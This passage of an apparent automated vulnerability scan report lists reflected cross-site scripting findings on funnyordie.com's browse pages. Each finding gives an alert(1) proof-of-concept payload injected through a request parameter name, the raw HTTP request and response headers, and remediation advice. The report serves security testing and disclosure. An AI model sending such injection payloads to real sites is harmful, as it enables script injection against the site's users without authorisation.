1.21. http://www.funnyordie.com/browse/stories [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/stories
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d669b"-alert(1)-"e7b610f1771 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/stories?d669b"-alert(1)-"e7b610f1771=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "294be3a6f764e1afe43a83184acfa6d3" X-Runtime: 748 X-Varnish: 1401120274 X-Varnish: 1264352280 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:05:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:05:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 127795
1.22. http://www.funnyordie.com/browse/stories [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/stories
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91a3e"><script>alert(1)</script>6ac0701d29c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/stories?91a3e"><script>alert(1)</script>6ac0701d29c=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "bd22b131d1ff045a342b5173d606bc38" X-Runtime: 723 X-Varnish: 1401119667 X-Varnish: 573897645 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:05:01 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:05:01 GMT Connection: close Connection: Transfer-Encoding Content-Length: 128502
1.23. http://www.funnyordie.com/browse/videos [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/videos
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e58f'-alert(1)-'84896111f7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos?4e58f'-alert(1)-'84896111f7d=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "9c9959d813f990108c45dcb1ea5bddcf" X-Runtime: 705 X-Varnish: 1401115317 X-Varnish: 573891916 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:00:40 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:00:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 153344
1.24. http://www.funnyordie.com/browse/videos [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/videos
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8de59"-alert(1)-"26840832574 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos?8de59"-alert(1)-"26840832574=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "94acb170ddca961027a6e97594ce408c" X-Runtime: 339 X-Varnish: 1401115048 X-Varnish: 573891560 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:00:23 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:00:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 153383
1.25. http://www.funnyordie.com/browse/videos [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/videos
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fc5d"><script>alert(1)</script>e1d30ac31da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/videos?3fc5d"><script>alert(1)</script>e1d30ac31da=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "ef2e9b54a0c71fb068993097b946bb3a" X-Runtime: 784 X-Varnish: 1401114274 X-Varnish: 573890523 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 04:59:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 04:59:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 154103
1.26. http://www.funnyordie.com/browse/videos/all/all/most_recent [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/videos/all/all/most_recent
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1492c'-alert(1)-'333dc64d28d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/all/all/most_recent?1492c'-alert(1)-'333dc64d28d=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "e498b524e3007f34afdbf2c2072f5d30" X-Runtime: 520 X-Varnish: 1401117908 X-Varnish: 1264349407 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:03:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:03:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 130025
1.27. http://www.funnyordie.com/browse/videos/all/all/most_recent [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/videos/all/all/most_recent
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3ca5"-alert(1)-"357ef17ac99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/all/all/most_recent?c3ca5"-alert(1)-"357ef17ac99=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "9defa12117f2cb5d85b8874c42dabc66" X-Runtime: 668 X-Varnish: 1401116962 X-Varnish: 573894077 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:02:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:02:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 129996
1.28. http://www.funnyordie.com/browse/videos/all/all/most_recent [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/videos/all/all/most_recent
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c804b"><script>alert(1)</script>29491a2601b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/videos/all/all/most_recent?c804b"><script>alert(1)</script>29491a2601b=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "89b1ee039aa769362aaab4b5d4bd6dca" X-Runtime: 338 X-Varnish: 1401116669 X-Varnish: 1264348054 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:02:01 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:02:01 GMT Connection: close Connection: Transfer-Encoding Content-Length: 130750
1.29. http://www.funnyordie.com/browse/videos/all/all/most_viewed [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/videos/all/all/most_viewed
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d93d"><script>alert(1)</script>2134e1a5ef0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/videos/all/all/most_viewed?5d93d"><script>alert(1)</script>2134e1a5ef0=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "3686ff1ecfe60bc1edfe52cc25b8828e" X-Runtime: 399 X-Varnish: 1401115709 X-Varnish: 1264347024 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:01:05 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:01:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 154692
1.30. http://www.funnyordie.com/browse/videos/all/all/most_viewed [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/videos/all/all/most_viewed
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ddd9'-alert(1)-'5822c31ef7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/all/all/most_viewed?6ddd9'-alert(1)-'5822c31ef7c=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "5cf7988500582c0d1f87ba936a89d865" X-Runtime: 362 X-Varnish: 1401116728 X-Varnish: 573893747 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:02:05 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:02:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 153968
1.31. http://www.funnyordie.com/browse/videos/all/all/most_viewed [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/videos/all/all/most_viewed
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c7e0"-alert(1)-"593eda50da4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/all/all/most_viewed?3c7e0"-alert(1)-"593eda50da4=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "aed381b431cf1fa9d409558796fe731a" X-Runtime: 435 X-Varnish: 1401116362 X-Varnish: 573893234 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:01:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:01:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 153962
1.32. http://www.funnyordie.com/browse/videos/all/all/most_viewed/this_month [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/videos/all/all/most_viewed/this_month
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec6eb"-alert(1)-"5ddda637d58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/all/all/most_viewed/this_month?ec6eb"-alert(1)-"5ddda637d58=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "4ed38180ab6029a49a1c16a15e63d89e" X-Runtime: 314 X-Varnish: 1401119082 X-Varnish: 573896914 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:04:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:04:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 157280
1.33. http://www.funnyordie.com/browse/videos/all/all/most_viewed/this_month [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/videos/all/all/most_viewed/this_month
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f96ce'-alert(1)-'99aa59495a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/all/all/most_viewed/this_month?f96ce'-alert(1)-'99aa59495a9=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "7b21daf91d31f8a40aa82450ad9c877a" X-Runtime: 730 X-Varnish: 1401119793 X-Varnish: 573897787 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:05:09 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:05:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 157270
<!DOCTYPE html> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <link rel="search" type="application/opensearchdescription+xml" title= ...[SNIP]... L = 'Thanks for your tweet'; } }); }); $('twitter_action_area').show(); GA.event('sharing','twitter_share','"/browse/videos/all/all/most_viewed/this_month?f96ce'-alert(1)-'99aa59495a9=1"'); }); } });
1.34. http://www.funnyordie.com/browse/videos/all/all/most_viewed/this_month [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/videos/all/all/most_viewed/this_month
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 893db"><script>alert(1)</script>e45399b77c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/videos/all/all/most_viewed/this_month?893db"><script>alert(1)</script>e45399b77c4=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "7a2d66e48aa0f67936738d45ec4faa35" X-Runtime: 651 X-Varnish: 1401118362 X-Varnish: 1264349972 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:03:44 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:03:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 157987
1.35. http://www.funnyordie.com/browse/words [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/words
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae644"-alert(1)-"a03828339cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/words?ae644"-alert(1)-"a03828339cd=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "f6a956224c012c140166d1140df5a5e1" X-Runtime: 380 X-Varnish: 1401121806 X-Varnish: 1264354446 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:07:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:07:03 GMT Connection: close Connection: Transfer-Encoding Content-Length: 126712
1.36. http://www.funnyordie.com/browse/words [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/words
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 329cb'-alert(1)-'fde36c9fe21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/words?329cb'-alert(1)-'fde36c9fe21=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "864f0aa52caa0c6da6d6c3c83d1f1047" X-Runtime: 573 X-Varnish: 1401122093 X-Varnish: 1264354802 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:07:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:07:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 126703
1.37. http://www.funnyordie.com/browse/words [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/words
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2e30"><script>alert(1)</script>6c5b3420822 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/words?e2e30"><script>alert(1)</script>6c5b3420822=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "51bbd4607aef794762f566a0eca5fd7d" X-Runtime: 882 X-Varnish: 1401121157 X-Varnish: 573899003 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:06:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:06:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 127398
1.38. http://www.funnyordie.com/browse/words/all/all/most_recent [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/words/all/all/most_recent
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73c1b"-alert(1)-"2137999d6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/words/all/all/most_recent?73c1b"-alert(1)-"2137999d6b=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "973d77e22e9e3fc211acf5c0b42e02c5" X-Runtime: 532 X-Varnish: 1401119405 X-Varnish: 573897295 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:04:44 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:04:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 123370
1.39. http://www.funnyordie.com/browse/words/all/all/most_recent [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/words/all/all/most_recent
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f250d"><script>alert(1)</script>8475e13ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/words/all/all/most_recent?f250d"><script>alert(1)</script>8475e13ad=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "6560ef23a61eeef797cbff8fb80bf3a4" X-Runtime: 341 X-Varnish: 1401118873 X-Varnish: 573896623 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:04:14 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:04:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 124090
1.40. http://www.funnyordie.com/browse/words/all/all/most_recent [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/words/all/all/most_recent
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83eb2'-alert(1)-'0077d077bf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/words/all/all/most_recent?83eb2'-alert(1)-'0077d077bf6=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "3bdec422851542d37440af8cc179f963" X-Runtime: 494 X-Varnish: 1401120007 X-Varnish: 1264351883 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:05:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:05:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 123369
1.41. http://www.funnyordie.com/browse/words/all/all/most_viewed [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/words/all/all/most_viewed
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a6e7"-alert(1)-"babc13cf69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/words/all/all/most_viewed?4a6e7"-alert(1)-"babc13cf69=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "451c76ce81b2b648cc20fccb7bf6cc3e" X-Runtime: 678 X-Varnish: 1401120635 X-Varnish: 1264352773 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:05:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:05:57 GMT Connection: close Connection: Transfer-Encoding Content-Length: 127247
1.42. http://www.funnyordie.com/browse/words/all/all/most_viewed [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/words/all/all/most_viewed
Issue detail
